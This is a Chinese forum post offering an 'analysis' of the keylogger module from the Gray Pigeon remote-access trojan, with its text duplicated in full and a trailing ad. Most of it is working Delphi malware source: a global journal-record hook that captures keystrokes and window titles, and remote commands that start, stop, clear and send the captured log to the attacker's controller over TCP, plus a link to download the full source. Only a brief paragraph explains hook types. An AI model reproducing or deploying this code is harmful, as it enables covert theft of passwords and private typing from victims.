灰鸽子键盘记录源码分析
首先是:var
LogHook: HHook = 0;HookList: TStringList;函数:function LogProc(iCode: Integer; wparam, lparam: LongInt): lresult; stdcall;
var
ch: Char;
vKey: Integer;
FocusWnd: HWND;
Title: array[0..255] of Char;
str: array[0..12] of Char;
TempStr, Time: string;
LogFile: TextFile;
PEvt: ^EVENTMSG;
iCapital, iNumLock, iShift: Integer;
bShift, bCapital, bNumLock: Boolean;
begin
if iCode < 0 then
begin
Result := CallNextHookEx(LogHook, iCode, wParam, lParam);
exit;
end;
if (iCode = HC_ACTION) then
begin
pEvt := Pointer(DWord(lParam)); FocusWnd := GetActiveWindow;
if LastFocusWnd <> FocusWnd then
begin
if hookkey<>'' then
begin
HookList.Add(hookkey);
hookkey :='';
end;
HookList.Add('======End=====');
HookList.Add('=====begin====');
GetWindowText(FocusWnd, Title, 256);
LastFocusWnd := FocusWnd;
Time := DateTimeToStr(Now);
HookList.Add(Time + Format('Title:%s', [Title]));
end; if pEvt.message = WM_KEYDOWN then
begin
vKey := LOBYTE(pEvt.paramL);
iShift := GetKeyState($10);
iCapital := GetKeyState($14);
iNumLock := GetKeyState($90);
bShift := ((iShift and KeyMask) = KeyMask);
bCapital := ((iCapital and 1) = 1);
bNumLock := ((iNumLock and 1) = 1); //HookList.Add('这是vKey:'+inttostr(vKey)); if ((vKey >= 48) and (vKey <= 57)) then
begin
if not bShift then
begin
ch := Char(vKey);
end else begin
case vKey of
48: ch := ')';
49: ch := '!';
50: ch := '@';
51: ch := '#';
52: ch := '$';
53: ch := '%';
54: ch := '^';
55: ch := '&';
56: ch := '*';
57: ch := '(';
end;
end;
hookkey:=hookkey+ch;
end;
if (vKey >= 65) and (vKey <= 90) then // A-Z a-z
begin
if not bCapital then
begin
if bShift then
ch := Char(vKey)
else
ch := Char(vKey + 32);
end
else begin
if bShift then
ch := Char(vKey + 32)
else
ch := Char(vKey);
end;
hookkey:=hookkey+ch;
end;
if (vKey >= 96) and (vKey <= 105) then // 小键盘0-9
if bNumLock then
hookkey:=hookkey+Char(vKey - 96 + 48);
ch:='n';
if (VKey > 105) and (VKey <= 111) then
begin
case vKey of
106: ch := '*';
107: ch := '+';
109: ch := '-';
111: ch := '/';
else
ch := 'n';
end;
end;
if (vKey >= 186) and (vKey <= 222) then // 其他键
begin
case vKey of
186: if not bShift then ch := ';' else ch := ':';
187: if not bShift then ch := '=' else ch := '+';
188: if not bShift then ch := ',' else ch := '<';
189: if not bShift then ch := '-' else ch := '_';
190: if not bShift then ch := '.' else ch := '>';
191: if not bShift then ch := '/' else ch := '?';
192: if not bShift then ch := '`' else ch := '~';
219: if not bShift then ch := '[' else ch := '{';
220: if not bShift then ch := '\' else ch := '|';
221: if not bShift then ch := ']' else ch := '}';
222: if not bShift then ch := Char(27) else ch := '"';
else
ch := 'n';
end;
end;
if ch <> 'n' then
hookkey:=hookkey+ ch; // if (wParam >=112 && wParam<=123) // 功能键 [F1]-[F12]
if (vKey >= 8) and (vKey <= 46) then //方向键
begin
ch := ' ';
case vKey of
8: str := '[退格]';
9: str := '[TAB]';
13: str := '[Enter]';
32: str := '[空格]';
33: str := '[PageUp]';
34: str := '[PageDown]';
35: str := '[End]';
36: str := '[Home]';
37: str := '[LF]';
38: str := '[UF]';
39: str := '[RF]';
40: str := '[DF]';
45: str := '[Insert]';
46: str := '[Delete]';
else
ch := 'n';
end;
if ch <> 'n' then
begin
//if PrvChar<>Char(vKey) then
//begin
hookkey :=hookkey+str;
// PrvChar := Char(vKey);
//end;
end;
end;
end ;
{ else
if (pEvt.message = WM_LBUTTONDOWN) or (pEvt.message = WM_RBUTTONDOWN) then
begin
if hookkey<>'' then
begin
HookList.add(Hookkey);
hookkey:='';
end;
if pEvt.message = WM_LBUTTONDOWN then
TempStr := '鼠标左键: '
else
TempStr := '鼠标右键: ';
HookList.Add(TempStr + Format('x:%d,y:%d', [pEvt.paramL, pEvt.paramH]));
end;
//CloseFile(LogFile); }
end;
Result := CallNextHookEx(LogHook, iCode, wParam, lParam);
end;
///////////////////////////////////////////////////////////////////////////////////// if StrTmpList[1]='039' then
begin {启动键盘记录}
if LogHook = 0 then
begin
Request:='Cmd009'; //启动键盘记录成功!查看记录前请先终止键盘记录!
LogHook := SetWindowsHookEx(WH_JOURNALRECORD, LogProc, HInstance, 0);
end else begin
Request:='Cmd010'; //键盘记录已经启动过了!
end;
if Request='' then Request:='Cmd011'; //启动键盘记录成功!查看记录前请先终止键盘记录!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='040' then
begin {终止键盘记录}
try
if LogHook <> 0 then
begin
UnhookWindowsHookEx(LogHook);
LogHook := 0;
HookList.Add(Hookkey);
HookList.Add('*********End**********');
Hookkey:='';
end;
except
end;
Request:='Cmd012'; //终止键盘记录成功!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='041' then
begin {查看键盘记录}
Request:=HookList.Text;
if Request='' then
begin
Request:='NULL'; //键盘记录为空.
end;
SendStreamToClient(IdTCPClient1,'018',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='042' then
begin {清空键盘记录}
try
HookList.Clear;
except
end;
Request:='Cmd014'; //清空键盘记录完成!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end; function LogProc(iCode: Integer; wparam, lparam: LongInt): lresult; stdcall;这是一个钩子的回调函数。当用下边用SetWindowsHookEx安装了一个WH_JOURNALRECORD类型的钩子成功后,
就会调用这个回调函数,也就是执行回调函数的功能WH_JOURNALRECORD 类型的钩子用来监视和记录输入事件。典型的,可以使用这个Hook记录连续的鼠标和键盘事件,
然后通过使用WH_JOURNALPLAYBACK Hook来回放。WH_JOURNALRECORD 钩子是全局钩子,它不能象线程特定钩子一样使用。像黑洞那样的能记录下输入的汉字和字符的一般都 是安装WH_GETMESSAGE类型 的钩子然后用回调函数过滤出英文字符和汉字。
--------------------------------------------------------------------------------------大家都来分析下 源程序下载地址
http://www.namipan.com/d/da0fd656272101aaa642e2172e15273fb2f1d9759f83f100
首先是:var
LogHook: HHook = 0;HookList: TStringList;函数:function LogProc(iCode: Integer; wparam, lparam: LongInt): lresult; stdcall;
var
ch: Char;
vKey: Integer;
FocusWnd: HWND;
Title: array[0..255] of Char;
str: array[0..12] of Char;
TempStr, Time: string;
LogFile: TextFile;
PEvt: ^EVENTMSG;
iCapital, iNumLock, iShift: Integer;
bShift, bCapital, bNumLock: Boolean;
begin
if iCode < 0 then
begin
Result := CallNextHookEx(LogHook, iCode, wParam, lParam);
exit;
end;
if (iCode = HC_ACTION) then
begin
pEvt := Pointer(DWord(lParam)); FocusWnd := GetActiveWindow;
if LastFocusWnd <> FocusWnd then
begin
if hookkey<>'' then
begin
HookList.Add(hookkey);
hookkey :='';
end;
HookList.Add('======End=====');
HookList.Add('=====begin====');
GetWindowText(FocusWnd, Title, 256);
LastFocusWnd := FocusWnd;
Time := DateTimeToStr(Now);
HookList.Add(Time + Format('Title:%s', [Title]));
end; if pEvt.message = WM_KEYDOWN then
begin
vKey := LOBYTE(pEvt.paramL);
iShift := GetKeyState($10);
iCapital := GetKeyState($14);
iNumLock := GetKeyState($90);
bShift := ((iShift and KeyMask) = KeyMask);
bCapital := ((iCapital and 1) = 1);
bNumLock := ((iNumLock and 1) = 1); //HookList.Add('这是vKey:'+inttostr(vKey)); if ((vKey >= 48) and (vKey <= 57)) then
begin
if not bShift then
begin
ch := Char(vKey);
end else begin
case vKey of
48: ch := ')';
49: ch := '!';
50: ch := '@';
51: ch := '#';
52: ch := '$';
53: ch := '%';
54: ch := '^';
55: ch := '&';
56: ch := '*';
57: ch := '(';
end;
end;
hookkey:=hookkey+ch;
end;
if (vKey >= 65) and (vKey <= 90) then // A-Z a-z
begin
if not bCapital then
begin
if bShift then
ch := Char(vKey)
else
ch := Char(vKey + 32);
end
else begin
if bShift then
ch := Char(vKey + 32)
else
ch := Char(vKey);
end;
hookkey:=hookkey+ch;
end;
if (vKey >= 96) and (vKey <= 105) then // 小键盘0-9
if bNumLock then
hookkey:=hookkey+Char(vKey - 96 + 48);
ch:='n';
if (VKey > 105) and (VKey <= 111) then
begin
case vKey of
106: ch := '*';
107: ch := '+';
109: ch := '-';
111: ch := '/';
else
ch := 'n';
end;
end;
if (vKey >= 186) and (vKey <= 222) then // 其他键
begin
case vKey of
186: if not bShift then ch := ';' else ch := ':';
187: if not bShift then ch := '=' else ch := '+';
188: if not bShift then ch := ',' else ch := '<';
189: if not bShift then ch := '-' else ch := '_';
190: if not bShift then ch := '.' else ch := '>';
191: if not bShift then ch := '/' else ch := '?';
192: if not bShift then ch := '`' else ch := '~';
219: if not bShift then ch := '[' else ch := '{';
220: if not bShift then ch := '\' else ch := '|';
221: if not bShift then ch := ']' else ch := '}';
222: if not bShift then ch := Char(27) else ch := '"';
else
ch := 'n';
end;
end;
if ch <> 'n' then
hookkey:=hookkey+ ch; // if (wParam >=112 && wParam<=123) // 功能键 [F1]-[F12]
if (vKey >= 8) and (vKey <= 46) then //方向键
begin
ch := ' ';
case vKey of
8: str := '[退格]';
9: str := '[TAB]';
13: str := '[Enter]';
32: str := '[空格]';
33: str := '[PageUp]';
34: str := '[PageDown]';
35: str := '[End]';
36: str := '[Home]';
37: str := '[LF]';
38: str := '[UF]';
39: str := '[RF]';
40: str := '[DF]';
45: str := '[Insert]';
46: str := '[Delete]';
else
ch := 'n';
end;
if ch <> 'n' then
begin
//if PrvChar<>Char(vKey) then
//begin
hookkey :=hookkey+str;
// PrvChar := Char(vKey);
//end;
end;
end;
end ;
{ else
if (pEvt.message = WM_LBUTTONDOWN) or (pEvt.message = WM_RBUTTONDOWN) then
begin
if hookkey<>'' then
begin
HookList.add(Hookkey);
hookkey:='';
end;
if pEvt.message = WM_LBUTTONDOWN then
TempStr := '鼠标左键: '
else
TempStr := '鼠标右键: ';
HookList.Add(TempStr + Format('x:%d,y:%d', [pEvt.paramL, pEvt.paramH]));
end;
//CloseFile(LogFile); }
end;
Result := CallNextHookEx(LogHook, iCode, wParam, lParam);
end;
///////////////////////////////////////////////////////////////////////////////////// if StrTmpList[1]='039' then
begin {启动键盘记录}
if LogHook = 0 then
begin
Request:='Cmd009'; //启动键盘记录成功!查看记录前请先终止键盘记录!
LogHook := SetWindowsHookEx(WH_JOURNALRECORD, LogProc, HInstance, 0);
end else begin
Request:='Cmd010'; //键盘记录已经启动过了!
end;
if Request='' then Request:='Cmd011'; //启动键盘记录成功!查看记录前请先终止键盘记录!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='040' then
begin {终止键盘记录}
try
if LogHook <> 0 then
begin
UnhookWindowsHookEx(LogHook);
LogHook := 0;
HookList.Add(Hookkey);
HookList.Add('*********End**********');
Hookkey:='';
end;
except
end;
Request:='Cmd012'; //终止键盘记录成功!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='041' then
begin {查看键盘记录}
Request:=HookList.Text;
if Request='' then
begin
Request:='NULL'; //键盘记录为空.
end;
SendStreamToClient(IdTCPClient1,'018',Request);
Exit;
end;
{------------------------------------}
if StrTmpList[1]='042' then
begin {清空键盘记录}
try
HookList.Clear;
except
end;
Request:='Cmd014'; //清空键盘记录完成!
SendStreamToClient(IdTCPClient1,'011',Request);
Exit;
end; function LogProc(iCode: Integer; wparam, lparam: LongInt): lresult; stdcall;这是一个钩子的回调函数。当用下边用SetWindowsHookEx安装了一个WH_JOURNALRECORD类型的钩子成功后,
就会调用这个回调函数,也就是执行回调函数的功能WH_JOURNALRECORD 类型的钩子用来监视和记录输入事件。典型的,可以使用这个Hook记录连续的鼠标和键盘事件,
然后通过使用WH_JOURNALPLAYBACK Hook来回放。WH_JOURNALRECORD 钩子是全局钩子,它不能象线程特定钩子一样使用。像黑洞那样的能记录下输入的汉字和字符的一般都 是安装WH_GETMESSAGE类型 的钩子然后用回调函数过滤出英文字符和汉字。
--------------------------------------------------------------------------------------大家都来分析下 源程序下载地址
http://www.namipan.com/d/da0fd656272101aaa642e2172e15273fb2f1d9759f83f100
解决方案 »
免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货